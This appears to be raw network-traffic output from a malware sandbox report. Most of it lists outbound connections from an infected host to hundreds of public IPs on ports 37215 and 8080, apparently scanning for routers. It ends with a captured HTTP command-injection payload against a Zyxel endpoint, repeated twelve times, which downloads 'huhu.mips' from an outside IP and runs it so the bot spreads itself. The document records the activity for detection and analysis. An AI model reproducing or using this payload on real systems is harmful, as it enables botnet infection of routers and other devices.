            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 197.49.129.125:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 180.249.51.76:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 197.112.112.115:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 197.11.40.200:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 218.174.3.95:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 197.34.174.110:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 41.68.107.108:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 157.139.228.87:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 143.235.102.233:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 157.99.113.155:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 157.19.197.252:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 157.215.174.70:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 157.189.91.231:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 197.206.12.196:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 170.215.44.96:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 197.218.228.199:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 100.3.40.125:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 157.232.223.75:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 41.218.189.76:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 157.183.128.101:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 197.203.47.211:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 197.93.122.197:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 41.65.11.122:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 157.150.56.14:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 41.33.178.23:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 98.125.4.94:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 160.171.102.211:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 157.22.252.248:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 154.10.94.70:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 157.113.229.205:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 141.104.149.162:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 197.54.34.236:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 5.180.131.55:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 197.115.123.74:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 197.165.253.246:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 41.109.206.68:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 157.161.229.200:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 157.231.176.170:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 41.247.145.161:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 41.84.210.120:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 41.55.109.48:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 157.34.210.144:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 197.193.45.40:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 213.180.75.202:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 157.153.166.219:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 197.64.188.140:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 41.22.106.197:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 1.68.151.183:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 51.120.234.252:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 157.73.245.128:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 197.13.249.174:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 197.47.140.134:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 5.53.217.2:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 197.16.48.230:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 42.51.106.196:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 41.163.185.216:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 171.1.92.55:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 175.177.180.43:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 41.248.171.131:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 156.12.113.217:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 41.66.49.236:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 157.8.57.3:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 157.132.130.249:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 157.88.52.107:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 197.15.212.0:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 41.160.199.212:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 157.63.31.86:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 157.171.251.1:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 41.111.185.144:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 197.29.208.86:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 157.168.181.242:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 197.166.131.205:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 197.115.44.13:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 41.52.112.200:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 157.32.227.83:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 197.214.176.9:37215
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 51.221.41.52:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 24.131.230.134:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 176.230.191.159:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 169.110.162.152:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 137.236.26.47:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 112.102.4.187:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 19.25.240.140:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 196.205.215.201:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 196.48.124.224:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 130.249.68.100:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 78.52.185.198:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 94.169.180.144:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 102.100.107.64:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 129.41.96.88:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 105.64.152.157:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 209.226.110.245:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 17.181.71.30:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 108.29.203.189:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 12.129.106.239:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 113.185.217.131:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 150.34.6.49:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 178.111.21.244:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 154.245.145.59:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 108.255.195.241:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 18.42.95.94:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 143.146.197.65:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 57.18.159.189:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 189.86.36.26:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 190.37.37.248:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 58.23.174.186:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 161.23.209.208:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 155.123.30.108:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 113.90.123.178:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 119.58.15.40:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 185.20.76.74:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 96.148.228.58:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 130.159.122.30:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 146.178.193.11:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 44.221.190.244:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 187.117.224.144:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 193.28.222.58:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 2.60.186.146:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 20.50.59.15:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 203.144.115.68:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 82.255.148.222:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 160.237.182.150:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 183.16.79.79:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 203.61.117.254:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 204.242.251.207:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 2.69.158.34:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 210.12.57.165:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 183.152.0.106:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 99.175.49.231:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 212.29.46.51:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 148.79.1.64:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 157.54.20.56:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 93.53.14.74:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 31.13.85.40:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 68.28.17.31:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 116.16.255.43:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 5.217.105.226:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 165.1.205.254:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 88.211.152.83:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 60.17.217.220:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 163.249.199.26:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 17.25.58.229:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 148.111.248.34:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 46.250.151.23:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 88.11.131.228:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 42.207.107.247:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 188.181.222.188:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 63.195.176.104:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 165.84.75.98:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 216.21.0.164:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 199.117.78.181:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 54.25.79.231:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 31.228.132.117:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 93.93.93.108:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 149.213.129.79:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 106.215.253.23:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 197.78.222.25:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 142.129.113.158:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 89.194.93.124:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 207.194.102.18:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 9.129.175.193:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 46.202.9.236:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 12.209.213.148:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 183.198.60.236:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 112.188.41.89:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 181.158.60.110:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 182.206.111.0:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 52.223.60.5:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 95.84.5.112:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 109.228.160.229:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 160.123.149.110:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 126.236.103.220:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 25.157.31.54:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 211.153.81.193:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 76.48.145.22:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 52.207.95.198:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 58.14.112.47:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 72.188.156.63:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 104.216.213.221:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 141.144.175.51:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 12.199.227.81:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 141.241.230.184:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 169.35.231.72:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 77.209.38.51:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 43.143.187.16:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 206.243.116.72:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 123.214.187.68:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 167.199.33.209:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 197.22.210.65:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 24.91.117.37:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 209.237.177.184:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 208.215.138.157:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 121.95.247.232:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 150.252.193.185:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 197.226.35.242:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 64.193.72.141:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 155.64.55.182:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 205.38.32.23:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 102.135.166.121:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 208.100.39.136:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 25.169.67.243:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 213.8.185.98:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 104.5.80.184:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 141.209.175.125:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 136.28.10.238:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 78.18.71.34:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 9.35.78.245:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 59.230.151.145:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 99.127.33.170:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 152.21.187.205:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 115.204.185.216:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 116.244.120.178:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 81.65.238.206:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 86.252.146.162:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 105.96.137.18:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 148.213.39.15:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 101.231.14.215:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 64.229.91.186:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 176.39.176.252:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 12.16.167.209:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 124.32.73.141:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 41.226.148.30:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 197.110.67.54:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 61.167.3.9:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 122.223.124.211:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 182.79.11.61:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 209.170.46.90:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 138.13.60.240:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 153.48.44.246:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 183.244.134.192:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 73.206.185.97:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 47.116.174.138:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 101.158.245.31:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 95.157.119.75:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 208.84.84.143:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 206.97.184.4:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 94.140.164.213:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 35.223.176.252:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 182.225.207.11:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 162.65.213.213:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 27.8.29.207:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 12.109.139.88:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 111.247.217.152:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 140.185.191.235:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 52.120.250.51:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 167.251.212.6:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 104.136.21.244:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 13.153.230.240:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 205.12.9.207:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 67.79.56.160:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 107.226.21.3:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 23.62.93.19:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 92.54.170.215:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 48.11.32.76:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 49.197.23.73:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 144.54.122.48:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 116.2.127.49:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 57.170.1.255:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 47.69.171.14:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 108.43.225.153:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 65.241.153.71:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 47.194.184.153:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 63.176.220.183:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 27.97.125.176:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 86.202.62.119:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 43.18.133.174:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 221.189.225.235:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 139.21.52.136:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 51.54.53.208:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 24.221.209.126:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 24.127.100.200:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 32.204.109.35:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 182.78.126.154:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 93.106.183.6:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 207.13.202.146:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 60.248.250.18:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 133.172.191.230:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 164.35.35.166:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 154.226.116.82:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 219.242.238.175:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 157.112.134.182:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 102.254.63.130:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 208.133.34.190:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 142.60.9.75:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 219.175.22.169:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 171.17.150.111:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 57.37.241.138:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 77.15.175.211:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 8.79.94.124:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 134.40.38.129:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 137.210.64.223:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 89.68.103.216:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 9.176.162.106:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 64.169.80.78:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 153.172.237.146:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 44.110.184.52:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 59.14.139.107:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 83.47.178.121:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 59.186.68.232:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 39.98.78.119:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 201.60.153.63:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 85.140.84.125:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 134.245.255.150:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 139.140.30.40:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 93.39.32.244:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 129.158.75.29:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 74.200.238.64:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 18.147.228.124:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 189.151.229.179:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 24.89.12.144:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 186.60.138.152:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 18.145.37.122:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 125.221.167.54:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 24.240.148.167:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 54.150.121.38:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 75.207.128.16:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 120.96.29.13:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 53.118.54.159:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 176.92.200.83:8080
            Source: global trafficTCP traffic: 192.168.2.14:37748 -> 96.198.108.9:8080
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
